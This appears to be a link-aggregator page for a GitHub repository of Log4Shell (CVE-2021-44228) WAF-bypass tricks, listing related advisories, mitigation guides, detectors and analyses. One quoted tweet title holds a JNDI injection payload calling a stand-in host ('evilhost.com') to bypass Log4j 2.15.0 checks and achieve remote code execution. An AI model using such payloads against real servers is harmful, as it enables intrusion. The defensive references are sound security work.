Linking pages
- Log4J: A Look into Threat Actors Exploitation Attempts | Cato Networks https://www.catonetworks.com/blog/log4j-a-look-into-threat-actors-exploitation-attempts/ 14 comments
- Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228 & CVE-2021-45046) | LunaTrace https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/ 12 comments
- GitHub - Puliczek/awesome-list-of-secrets-in-environment-variables: 🦄🔒 Awesome list of secrets in environment variables 🖥️ https://github.com/Puliczek/awesome-list-of-secrets-in-environment-variables 3 comments
- log4shell - Quick Guide - musana https://musana.net/2021/12/13/log4shell-Quick-Guide/ 2 comments
- How to Automatically Mitigate Log4Shell via a Live Patch (CVE-2021-44228 + CVE-2021-45046) | LunaTrace https://www.lunasec.io/docs/blog/log4shell-live-patch/ 0 comments
Linked pages
- Log4j – Apache Log4j Security Vulnerabilities https://logging.apache.org/log4j/2.x/security.html 708 comments
- [LOG4J2-3230] Certain strings can cause infinite recursion - ASF JIRA https://issues.apache.org/jira/browse/LOG4J2-3230 180 comments
- Remote code injection in Log4j · CVE-2021-44228 · GitHub Advisory Database · GitHub https://github.com/advisories/GHSA-jfh8-c2jp-5v3q 77 comments
- Canarytokens https://canarytokens.org/generate 67 comments
- GitHub - Puliczek/awesome-list-of-secrets-in-environment-variables: 🦄🔒 Awesome list of secrets in environment variables 🖥️ https://github.com/Puliczek/awesome-list-of-secrets-in-environment-variables 3 comments
- Márcio Almeida on Twitter: "FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} and to bypass allowedClasses just choose a name for a class in the JDK. Deserialization will occur as usual. #Log4Shell 1/n" / Twitter https://twitter.com/marcioalm/status/1471740771581652995 1 comment
- GitHub - mergebase/log4j-detector: Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find Log4J instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too! https://github.com/mergebase/log4j-detector 0 comments
- Bypassing NGFW/WAFs using data format obfuscations | by Ivan Novikov | Medium https://medium.com/@d0znpp/bypassing-ngfw-wafs-using-data-format-obfuscations-188351ea9e73 0 comments
Related searches:
Search whole site: site:github.com
Search title: GitHub - Puliczek/CVE-2021-44228-PoC-log4j-bypass-words: 🐱💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - WAF bypass tricks
See how to search.